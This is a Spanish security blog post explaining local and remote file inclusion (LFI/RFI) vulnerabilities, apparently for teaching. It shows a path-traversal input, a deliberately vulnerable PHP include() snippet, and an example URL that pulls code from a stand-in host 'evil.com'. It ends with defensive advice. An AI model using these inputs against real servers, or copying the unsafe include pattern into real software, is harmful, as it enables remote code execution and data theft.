Ir al contenido principal

🥇▷ Ataque Inclusión de archivos locales y remotos (LFI/RFI)

 

Las vulnerabilidades LFI (Local File Inclusion) y RFI (Remote File Inclusion) son tipos comunes de vulnerabilidades de seguridad web que permiten a un atacante incluir archivos locales o remotos en una aplicación web de manera no segura. Estos tipos de vulnerabilidades son especialmente peligrosos, ya que pueden permitir a un atacante acceder a información confidencial del servidor, ejecutar código malicioso o realizar otros tipos de ataques.

A continuación, te proporciono ejemplos de LFI y RFI:

Ejemplo de LFI (Local File Inclusion):

Supongamos que tienes una aplicación web que carga archivos locales sin verificar adecuadamente las rutas. En un formulario de la aplicación, los usuarios pueden especificar un nombre de archivo que se carga y se muestra en una página. Si el desarrollador no valida o filtra adecuadamente la entrada del usuario, un atacante podría explotar esta vulnerabilidad.

URL de la aplicación: http://example.com/view.php?file=archivo.txt

Si el atacante ingresa "../archivo_secreto.txt" en el parámetro "file", el código del servidor puede interpretarlo incorrectamente y cargar el archivo_secreto.txt ubicado en un directorio anterior al que se debería permitir. De esta manera, el atacante puede leer información sensible o ejecutar archivos con contenido malicioso.

Ejemplo de RFI (Remote File Inclusion):

Supongamos que tienes una página que carga contenido de archivos remotos. Por ejemplo:



  <?php
  $url = $_GET['url'];
  include($url);
?>

El código anterior carga un archivo remoto especificado por el usuario a través del parámetro "url". Si un atacante pasa una URL controlada por él mismo como "url", puede hacer que el servidor incluya y ejecute código malicioso. URL de la página: http://example.com/view.php?url=http://evil.com/malicious_code.php En este ejemplo, si "malicious_code.php" contiene código malicioso, el servidor lo ejecutará cuando el archivo sea incluido. Esto puede permitir al atacante tomar el control del servidor o realizar otras acciones maliciosas. Es esencial protegerse contra estas vulnerabilidades mediante prácticas seguras de programación, como validar y filtrar adecuadamente la entrada del usuario, evitar la inclusión dinámica de archivos desde fuentes no confiables y mantener siempre actualizado el software utilizado en el servidor.

Entradas populares de este blog

🥇▷ Como hackear una base de datos con sqlmap

Como hackear una base de datos con sqlmap (sql injection) sqlmap --help Nos descargamos la pagina web vulnerable (DVWA) para practicar sobre diferentes ataques a nivel Web desde la siguiente url, y seguimos los pasos que nos indican para la instalacion web y su base de datos. https://github.com/digininja/DVWA/releases Una vez instalado nos vamos a burpsuite que esta en kali linux, aunque lo podemos encontrar para windows tambien. Le damos click. En esta ventana le damos Next (siguiente). En esta ventana le damos Start burp. Se nos abrira la ventana de burpsuite. Por cierto burpsuite sirve para escanear webs y encontrar vulnerabilidades de forma automatica (30 dias gratis) o de forma manual gratis, si ya hemos localizado la vulnerabilidad atraves de un proxy. Esta vez lo hacemos de forma manual. Nos vamos a la pestaña proxy. Activamos intercept is on. Y le damos a open browser. Ponemos la direccion Web de DVWA de nuestra web vulnerable. Le d

🥇▷ Vulnerabilidad xss en web gva.es generalitat valenciana

Vulnerabilidad xss reflected en web generalitat valenciana > gva.es El dia que encontremos 2 vulnerabilidades y la reportemos al organismo de la comunidad valenciana (españa) basada en la vulnerabilidad xss reflected. ¿Que es una vulnerabilidad xss reflected? Una secuencia de comandos en sitios cruzados o Cross-site scripting es un tipo de vulnerabilidad informática o agujero de seguridad típico de las aplicaciones Web, que puede permitir a una tercera persona inyectar en páginas web visitadas por el usuario código JavaScript o en otro lenguaje similar.

🥇▷ Libros de Seguridad Informatica

Libros de Seguridad Informatica https://0xword.com/